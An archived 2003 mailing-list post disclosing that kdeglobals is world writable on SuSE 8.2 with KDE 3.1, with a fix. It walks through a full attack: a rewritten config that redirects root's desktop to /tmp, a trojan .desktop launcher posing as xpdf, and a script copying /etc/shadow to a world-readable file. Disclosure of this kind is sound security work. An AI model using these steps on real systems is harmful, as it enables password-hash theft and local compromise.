Vulnerability Development mailing list archives

KDE 3.1 - Suse 8.2 - kdeglobals world writable

From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)

Hi, Mrs.!

I have found one problem in suse 8.2 with KDE 3.1
(default instalation in brazilian version). The
configurarion file "kdeglobals" in
/etc/opt/kde3/share/config is world writable.

One attacker can  exploit this vulnerability
with many ways.

One basic example of attack is:

I - Overwrite de kdeglobals file with contents
below:


#
# written by SuSEconfig.kde
#
[Locale]
Country=pt
Language=pt:BR


#Abaixo jah alterados.

[Paths]
Desktop=/tmp/Desktop

II - Create folder /tmp/Desktop e one trojan
horse in some file .desktop inside then. Example:

glaudson@suse:/tmp/Desktop> cat xpdf.desktop
[Desktop Entry]
Exec=/tmp/AutoStart/teste.sh
Icon=gv
TerminalOptions=
Path=
Type=Application
Terminal=0
X-KDE-StartupNotify=false
glaudson@suse:/tmp/Desktop>

II - Create file to execute /tmp/Autostart/teste.sh
with backdoor/trojan/spyware/malware code.Example:

glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
#!/bin/bash
cp /etc/shadow /tmp/shadow
chmod 0777 /tmp/shadow


The icon "xpdf" will be appear in root's desktop.
If root run de icon, he run the trojan horse and
attack will be succeded.

There are many other forms for exploit this bug.

Solution: 

chmod 0500 /etc/opt/kde3/share/config/kdeglobals
or 
rm -rf /etc/opt/kde3/share/config/kdeglobals

There are again other files world writable
in suse 8.2(brazilian version):

glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2  !
\( -type l -o -type c -o -type s -o -perm -1000 \)
/etc/opt/kde3/share/config/kmailrc
/etc/opt/kde3/share/config/kioslaverc
/etc/opt/kde3/share/config/kdeglobals.SuSEconfig
/etc/opt/kde3/share/config/kdeglobals
find: /etc/opt/kde3/share/servicetypes: Permissão
negada


glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
SuSE Linux 8.2 (i586)
VERSION = 8.2
glaudson@suse:/tmp/Desktop> cat /proc/version
Linux version 2.4.20-4GB-athlon (root () Athlon suse de)
(gcc version 3.3 20030226 (prerelease) (SuSE Linux))
#1 Mon Mar 17 17:56:47 UTC 2003


Best Regards,

Martin Fallon.
Mercenarie's Club
http://cdm.frontthescene.com.br/







______________________________________________________________________

Yahoo! Mail: 6MB, anti-spam e antivírus gratuito! Crie sua conta agora:
http://mail.yahoo.com.br

Current thread:

KDE 3.1 - Suse 8.2 - kdeglobals world writable Martin Fallon (Nov 14)
- Re: KDE 3.1 - Suse 8.2 - kdeglobals world writable Dirk Mueller (Nov 14)